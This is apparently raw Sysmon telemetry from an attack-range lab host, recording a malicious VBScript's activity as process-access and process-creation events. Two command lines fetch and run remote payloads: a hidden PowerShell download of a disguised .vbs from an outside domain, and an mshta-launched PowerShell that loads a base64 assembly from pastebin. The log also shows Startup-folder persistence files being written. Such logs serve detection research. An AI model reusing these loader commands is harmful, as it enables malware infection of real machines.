08:00:52.155{58E9C193-B4B4-615A-3802-00000000FC01}64565948C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.167{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/pic.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4102-00000000FC01}6712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4102-00000000FC01}6712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:00:52.139{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbs2021-10-04 07:44:22.112 23542300x8000000000000000106920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-B4B4-615A-3802-00000000FC01}6456ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbsMD5=BBC2230817ED231DD2FE77849DEA54FB,SHA256=1BA98ACA3C82A11DADD3F685BBC7517710581BAA588556989CCF827399762F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3E02-00000000FC01}1596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3E02-00000000FC01}1596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4302-00000000FC01}5984C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-B4B4-615A-3802-00000000FC01}64564480C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.143{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-B4B4-615A-3E02-00000000FC01}15967192C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.139{58E9C193-B4B4-615A-4102-00000000FC01}67126372C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3C02-00000000FC01}6864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3C02-00000000FC01}6864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:00:52.125{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbs2021-10-04 07:44:22.097 23542300x8000000000000000106904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-B4B4-615A-3802-00000000FC01}6456ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbsMD5=BBC2230817ED231DD2FE77849DEA54FB,SHA256=1BA98ACA3C82A11DADD3F685BBC7517710581BAA588556989CCF827399762F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4102-00000000FC01}6712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-B4B4-615A-3C02-00000000FC01}68647824C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-B4B4-615A-3A02-00000000FC01}72004720C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4002-00000000FC01}2236C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3E02-00000000FC01}1596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 